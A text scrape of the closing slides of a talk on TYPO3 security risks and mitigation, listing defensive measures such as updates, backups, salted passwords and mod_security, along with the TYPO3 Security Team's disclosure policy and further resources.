    51. 51. Knowing the EnemyConclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools Inspiring people toTYPO Security - Risks and Mitigation share
    52. 52. Knowing the EnemyConclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools They often try to obfuscate the hack Inspiring people toTYPO Security - Risks and Mitigation share
    53. 53. Knowing the EnemyConclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools They often try to obfuscate the hack With automated attacks effort is low, gain is high Inspiring people toTYPO Security - Risks and Mitigation share
    54. 54. Mitigation Inspiring people toTYPO Security - Risks and Mitigation share
    55. 55. MitiationMandatory steps Inspiring people toTYPO Security - Risks and Mitigation share
    56. 56. MitiationMandatory steps Monitor and Back Up your Website Inspiring people toTYPO Security - Risks and Mitigation share
    57. 57. MitiationMandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Inspiring people toTYPO Security - Risks and Mitigation share
    58. 58. MitiationMandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Inspiring people toTYPO Security - Risks and Mitigation share
    59. 59. MitiationMandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Use saltedpasswords and advise your admins (and users) to use non obvious passwords Inspiring people toTYPO Security - Risks and Mitigation share
    60. 60. MitiationMandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Use saltedpasswords and advise your admins (and users) to use non obvious passwords Make your Integrators aware of possible TypoScript problems Inspiring people toTYPO Security - Risks and Mitigation share
    61. 61. MitiationAdvanced steps Inspiring people toTYPO Security - Risks and Mitigation share
    62. 62. MitiationAdvanced steps Use TYPO3 Core features in favour of extensions Inspiring people toTYPO Security - Risks and Mitigation share
    63. 63. MitiationAdvanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Inspiring people toTYPO Security - Risks and Mitigation share
    64. 64. MitiationAdvanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Consider using mod_security Inspiring people toTYPO Security - Risks and Mitigation share
    65. 65. MitiationAdvanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Consider using mod_security Consider using phpids TYPO3 Extension Inspiring people toTYPO Security - Risks and Mitigation share
    66. 66. TYPO3 Security Team Inspiring people toTYPO Security - Risks and Mitigation share
    67. 67. TYPO3 Security TeamImportant things to know Inspiring people toTYPO Security - Risks and Mitigation share
    68. 68. TYPO3 Security TeamImportant things to know Responsible Disclosure Policy Inspiring people toTYPO Security - Risks and Mitigation share
    69. 69. TYPO3 Security TeamImportant things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Inspiring people toTYPO Security - Risks and Mitigation share
    70. 70. TYPO3 Security TeamImportant things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Pre-Announcements for critical issues only Inspiring people toTYPO Security - Risks and Mitigation share
    71. 71. TYPO3 Security TeamImportant things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Pre-Announcements for critical issues only You can support us Inspiring people toTYPO Security - Risks and Mitigation share
    72. 72. TYPO Security - Risks and MitigationRescources PHP-Sicherheit (Christopher Kunz and Stefan Esser) Essential PHP Security (Chris Shiflett) http://www.owasp.org/ http://typo3.org/teams/security/security- bulletins/ http://typo3.org/teams/security/resources/ http://buzz.typo3.org/teams/security/ Inspiring people toTYPO Security - Risks and Mitigation share
    73. 73. Questions? Inspiring people toTYPO Security - Risks and Mitigation share
    74. 74. Thank You! Inspiring people toTYPO Security - Risks and Mitigation share
    75. 75. inspiring people to share.

    ×